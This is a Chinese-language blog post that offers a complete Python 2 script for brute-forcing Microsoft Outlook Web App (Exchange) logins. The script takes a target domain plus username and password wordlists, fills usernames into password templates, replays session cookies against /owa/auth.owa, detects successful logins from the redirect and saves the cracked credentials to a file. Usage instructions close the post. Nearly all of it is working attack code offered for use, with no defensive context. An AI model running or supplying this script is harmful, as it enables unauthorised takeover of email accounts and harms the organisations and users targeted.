MENU

Outlook Exchange Python邮箱爆破脚本

May 27, 2016 • Security

修改自Lijiejie:Microsoft Outlook WebAPP暴力破解脚本

# Encoding=utf-8

# Outlook.py

import argparse

import httplib

import urllib

import time

import ssl

#ssl._create_default_http_context = ssl._create_unverified_context

parser = argparse.ArgumentParser(description='Microsoft OutLook WebAPP Brute Forcer.')

parser.add_argument('domain', type=str, help='website domain name, e.g. email.baidu.com')

parser.add_argument('users', type=str, help='username dict file path, e.g. users.txt')

parser.add_argument('passwords', type=str, help='passwords dict file path, e.g. passwords.dic')

args = parser.parse_args()

users = []

with open(args.users) as inFile:

    while True:

        user = inFile.readline().strip()

        if len(user) == 0: break

        users.append(user)

passwords = []

with open(args.passwords) as inFile:

    while True:

        pwd = inFile.readline().strip()

        if len(pwd) == 0: break

        passwords.append(pwd)




headers = {

    'Accept': '*/*',

    'Referer': 'http://' + args.domain + '/owa/auth/logon.aspx?replaceCurrent=1&reason=2&url=http%3a%2f%2f' + args.domain + '%2fowa%2f',

    'Accept-Language': 'zh-CN',

    'Content-Type': 'application/x-www-form-urlencoded',

    'User-Agent': 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; ',

    'Connection': 'Keep-Alive',

    'Cache-Control': 'no-cache',

    'Cookie': '',

}

for user in users:

    for pwd in passwords:

        pwd = pwd.replace('<user>', user)

        print 'testing', user, ' -- ', pwd

        res={}

        tryt=1

        while True and tryt > 0:

            try:

                conn = httplib.HTTPSConnection(args.domain)

                conn.request(method='GET', url='/owa/')

                res = dict(conn.getresponse().getheaders())

                conn.close()

                break

            except Exception, e:

                tryt -= 1

                print e

                print '!!!Error occured #1'

                break

        session=''

        if res.has_key('Set-Cookie'):

            session = res['set-cookie'].split(';')[0]     # Get Session ID

        headers2 = headers

        headers2['Cookie'] = 'OutlookSession=%s ; PBack=0' % session

        data = {'destination': 'http://%s/owa/' % args.domain,

                'flags': '0', 'forcedownlevel': '0', 'trusted':'0',

                'username':user, 'password':pwd,

                'isUtf8':'1', 'Cookie': 'OutlookSession=%s; PBack=0' % session}

        tryt = 3

        url='reason='

        while True and tryt > 0:

            try:

                conn = httplib.HTTPSConnection(args.domain)

                conn.request(method='POST', url='/owa/auth.owa', body=urllib.urlencode(data), headers=headers2)

                url = dict(conn.getresponse().getheaders())['location']

                conn.close()

                break

            except Exception, e:

                tryt -= 1

                print e

                print '!!!Error occured #2'

        if url.find('reason=') < 0:

            print '(SUCESS)>> User:', user, 'Password:', pwd

            with open('cracked_email.txt', 'a') as outFile:

                outFile.write(user + ' ' + pwd + '\n')

使用方法:

Outlook.py mail.xxx.cn  user.txt pass.txt

pass.txt中可以引用user字段方式:

<user>123

<user>123456
Archives QR Code
QR Code for this page
Tipping QR Code